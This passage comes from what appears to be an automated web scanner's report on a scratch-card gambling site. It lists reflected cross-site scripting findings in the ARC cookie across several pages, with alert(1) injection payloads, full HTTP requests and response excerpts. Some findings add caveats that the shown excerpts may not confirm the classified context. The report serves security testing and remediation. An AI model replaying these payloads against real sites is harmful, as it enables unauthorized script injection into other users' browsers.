<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301378654c--><script>alert(1)</script>38a0a9c6cd5">
...[SNIP]...

3.345. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7291'%3balert(1)//55d69b80cd6 was submitted in the ARC cookie. This input was echoed as d7291';alert(1)//55d69b80cd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d7291'%3balert(1)//55d69b80cd6; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23678
Content-Type: text/html
Set-Cookie: ARC=130137d7291%27%3Balert%281%29%2F%2F55d69b80cd6; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=130137d7291';alert(1)//55d69b80cd6&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.346. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0f4e"%3balert(1)//baa429ed4f was submitted in the ARC cookie. This input was echoed as d0f4e";alert(1)//baa429ed4f in the application's response. The response excerpt below starts at an <img> tag with single-quoted attributes, where a double quote is inert; the enclosing script block and the opening double quote of the string are outside the excerpt and should be verified in the full response body.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d0f4e"%3balert(1)//baa429ed4f; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23675
Content-Type: text/html
Set-Cookie: ARC=130137d0f4e%22%3Balert%281%29%2F%2Fbaa429ed4f; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137d0f4e";alert(1)//baa429ed4f' border='0' width='1' height='1'>
...[SNIP]...

3.347. http://www.primescratchcards.com/contactus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bbe1'%3balert(1)//f80c8b5157d was submitted in the ARC cookie. This input was echoed as 9bbe1';alert(1)//f80c8b5157d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301379bbe1'%3balert(1)//f80c8b5157d; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25569
Content-Type: text/html
Set-Cookie: ARC=1301379bbe1%27%3Balert%281%29%2F%2Ff80c8b5157d; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=1301379bbe1';alert(1)//f80c8b5157d&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.348. http://www.primescratchcards.com/contactus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /contactus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload e31ab--><script>alert(1)</script>f283e5f141d was submitted in the ARC cookie. This input was echoed unmodified in the application's response. The response excerpt below shows the reflection inside a double-quoted attribute value (value ="..."), where --> and <script> are inert; the opening <!-- the classification depends on lies outside the excerpt and should be verified in the full response body.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e31ab--><script>alert(1)</script>f283e5f141d; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25617
Content-Type: text/html
Set-Cookie: ARC=130137e31ab%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef283e5f141d; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137e31ab--><script>alert(1)</script>f283e5f141d">
...[SNIP]...

3.349. http://www.primescratchcards.com/contactus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83b35"%3balert(1)//c142e36960e was submitted in the ARC cookie. This input was echoed as 83b35";alert(1)//c142e36960e in the application's response. The response excerpt below starts at an <img> tag with single-quoted attributes, where a double quote is inert; the enclosing script block and the opening double quote of the string are outside the excerpt and should be verified in the full response body.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013783b35"%3balert(1)//c142e36960e; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25569
Content-Type: text/html
Set-Cookie: ARC=13013783b35%22%3Balert%281%29%2F%2Fc142e36960e; expires=Tue, 15-May-2012 12:35:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013783b35";alert(1)//c142e36960e' border='0' width='1' height='1'>
...[SNIP]...

3.350. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4224f"%3balert(1)//98ccd355496 was submitted in the ARC cookie. This input was echoed as 4224f";alert(1)//98ccd355496 in the application's response. The response excerpt below starts at an <img> tag with single-quoted attributes, where a double quote is inert; the enclosing script block and the opening double quote of the string are outside the excerpt and should be verified in the full response body.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374224f"%3balert(1)//98ccd355496; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22374
Content-Type: text/html
Set-Cookie: ARC=1301374224f%22%3Balert%281%29%2F%2F98ccd355496; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301374224f";alert(1)//98ccd355496' border='0' width='1' height='1'>
...[SNIP]...

3.351. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 498e3'-alert(1)-'22b43d37a6b was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137498e3'-alert(1)-'22b43d37a6b; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22340
Content-Type: text/html
Set-Cookie: ARC=130137498e3%27%2Dalert%281%29%2D%2722b43d37a6b; expires=Tue, 15-May-2012 12:34:46 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=130137498e3'-alert(1)-'22b43d37a6b&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.352. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /fairplay.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload bcf11--><script>alert(1)</script>7a152d745f7 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

Caveat on the excerpt below: the fragment shown is the double-quoted value attribute of a hidden input, where --> and <script> are inert because they remain part of the attribute value until the closing quote. The HTML-comment reflection that the scanner classified is not visible in the elided response, so confirm it in the full page source before rating, and probe the hidden input separately with a payload that carries a double quote. The same applies to the other HTML-comment findings for help.asp, index.asp, media.asp and playersclub.asp below, which show the same hidden-input fragment.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bcf11--><script>alert(1)</script>7a152d745f7; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22388
Content-Type: text/html
Set-Cookie: ARC=130137bcf11%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7a152d745f7; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137bcf11--><script>alert(1)</script>7a152d745f7">
...[SNIP]...

3.353. http://www.primescratchcards.com/help.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e18c"%3balert(1)//5fae78ef75a was submitted in the ARC cookie. This input was echoed as 3e18c";alert(1)//5fae78ef75a in the application's response: the server URL-decodes the cookie value, so %3b arrives in the page as a literal semicolon.

Caveat on the excerpt below: the fragment shown is the single-quoted src attribute of a tracking pixel, not a double-quoted script string, and a double quote does not terminate that attribute. The script-string reflection that the scanner classified is not visible in the elided response and should be confirmed in the full page source. The same applies to the other double-quoted-string findings for index.asp, media.asp and playersclub.asp below, which show the same tracking-pixel fragment.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301373e18c"%3balert(1)//5fae78ef75a; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20819
Content-Type: text/html
Set-Cookie: ARC=1301373e18c%22%3Balert%281%29%2F%2F5fae78ef75a; expires=Tue, 15-May-2012 12:34:46 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301373e18c";alert(1)//5fae78ef75a' border='0' width='1' height='1'>
...[SNIP]...

3.354. http://www.primescratchcards.com/help.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /help.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload fd99e--><script>alert(1)</script>90104150d was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137fd99e--><script>alert(1)</script>90104150d; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20861
Content-Type: text/html
Set-Cookie: ARC=130137fd99e%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E90104150d; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137fd99e--><script>alert(1)</script>90104150d">
...[SNIP]...

3.355. http://www.primescratchcards.com/help.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4be8c'%3balert(1)//4c16ed10fec was submitted in the ARC cookie. This input was echoed as 4be8c';alert(1)//4c16ed10fec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374be8c'%3balert(1)//4c16ed10fec; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20819
Content-Type: text/html
Set-Cookie: ARC=1301374be8c%27%3Balert%281%29%2F%2F4c16ed10fec; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=1301374be8c';alert(1)//4c16ed10fec&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.356. http://www.primescratchcards.com/index.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0367"%3balert(1)//8f7b742c961 was submitted in the ARC cookie. This input was echoed as f0367";alert(1)//8f7b742c961 in the application's response.

Note that index.asp answered this request with 500 Internal Server Error (as it does for the two index.asp findings that follow) yet the error page still reflects the cookie value, so the error path is no safer than the normal one and a fix must cover both. The fragment shown is the single-quoted tracking-pixel src attribute; the double-quoted script-string context should be confirmed in the full response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f0367"%3balert(1)//8f7b742c961; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:34:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 7618
Content-Type: text/html
